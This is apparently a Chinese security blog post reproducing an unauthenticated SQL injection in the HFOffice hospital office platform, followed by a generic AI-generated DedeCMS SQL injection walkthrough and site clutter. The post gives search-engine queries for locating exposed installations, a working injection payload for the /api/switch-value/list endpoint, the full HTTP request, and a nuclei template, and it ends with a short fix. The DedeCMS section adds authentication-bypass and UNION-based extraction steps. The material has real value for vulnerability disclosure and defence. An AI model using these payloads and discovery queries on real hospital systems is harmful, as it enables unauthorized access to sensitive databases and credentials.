【漏洞复现】SQL注入漏洞

文章报道了广州红帆科技的HFOffice医微云平台存在SQL注入漏洞,攻击者可通过未认证接口获取敏感信息。复现方法涉及MD5加密payload,建议调整web.config的Debug值为0以修复漏洞。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

漏洞描述

红帆HFOffice医微云是广州红帆科技有限公司研发的专注医疗行政办公管理,与企业微信全方位结合,提供协同办公、知识库、专家系统、BI等应用,进一步帮助医院移动办公落地,成就面向医院管理的“智慧管理”。平台list接口处存在SQL注入漏洞,未经身份认证的攻击者可通过该漏洞获取数据库敏感信息及凭证,最终可能导致服务器失陷。

资产收集

fofa:”HFOffice”
hunter:web.body=”HFOffice”
 

漏洞复现

payload:

/api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7

payload是对某一列数据进行md5加密,如果回显发现转换失败的话,就说明存在SQL注入漏洞。

流量包
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
Host: xxxxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
If-Modified-Since: Tue, 02 Mar 2021 07:52:43 GMT
If-None-Match: "aa32739fd71:0"

nuclei验证

nuclei-poc
id: HFOffice

info:
name: HFOffice-SQL
author: xxxx
severity: info
description: description
reference:
- https://
tags: tags

requests:
- raw:
- |+
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
If-Modified-Since: Tue, 02 Mar 2021 07:52:43 GMT
If-None-Match: "aa32739fd71:0"


matchers-condition: and
matchers:
- type: binary
part: body
binary:
- 20e580bc20273831444339424442353244303444433230303336444244383331
- type: status
status:
- 400
nuclei验证

修复意见

此漏洞是由于部分用户站点下web.config的Debug的值设置为1,导致系统存在SQL注入漏洞,只需让相关系统站点下web.config的Debug值设为0即可。


免费领取安全学习资料包!

渗透工具

技术文档、书籍

 

面试题

帮助你在面试中脱颖而出

视频

基础到进阶

环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等

 

应急响应笔记

学习路线

DedeCMS是一款流行的内容管理系统(CMS),但在过去的一些版本中存在SQL注入漏洞SQL注入是一种通过将恶意的SQL代码插入到应用程序的输入字段中,从而控制数据库执行非预期操作的攻击方式。以下是DedeCMS SQL注入漏洞复现的步骤: ### 步骤一:环境搭建 1. **下载DedeCMS**:从官方网站或其他可信来源下载DedeCMS的旧版本(存在漏洞的版本)。 2. **安装DedeCMS**:按照官方文档的步骤进行安装,确保数据库和Web服务器(如Apache或Nginx)正常运行。 ### 步骤二:识别漏洞 1. **查找注入点**:常见的注入点包括搜索功能、登录功能等。假设我们使用搜索功能作为注入点。 2. **构造恶意输入**:在搜索框中输入带有SQL注入的恶意输入。例如,`' OR '1'='1`。 ### 步骤三:执行SQL注入 1. **测试注入**:在搜索框中输入测试语句,观察页面响应。如果页面返回了异常的结果或错误信息,说明存在SQL注入漏洞。 2. **提取数据**:使用SQL注入技术提取数据库中的数据。例如,使用`UNION SELECT`语句结合`information_schema.tables`表来获取表名。 ### 步骤四:利用漏洞 1. **获取数据库信息**:通过SQL注入获取数据库版本、用户信息、数据库名等信息。 2. **获取表和列信息**:利用`information_schema`数据库获取表名和列名。 3. **提取数据**:根据获取的表名和列名,提取具体的数据。 ### 步骤五:修复漏洞 1. **更新DedeCMS**:升级到最新版本,修复已知的SQL注入漏洞。 2. **代码审计**:对代码进行审计,修复所有可能的注入点。 3. **使用参数化查询**:确保所有数据库查询都使用参数化查询,防止SQL注入。 ### 示例代码 以下是一个简单的示例,展示如何通过SQL注入获取数据库版本信息: ```sql SELECT * FROM users WHERE username = '' OR '1'='1' AND password = ''; ``` 通过这种方式,攻击者可以绕过身份验证,获取所有用户的信息。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值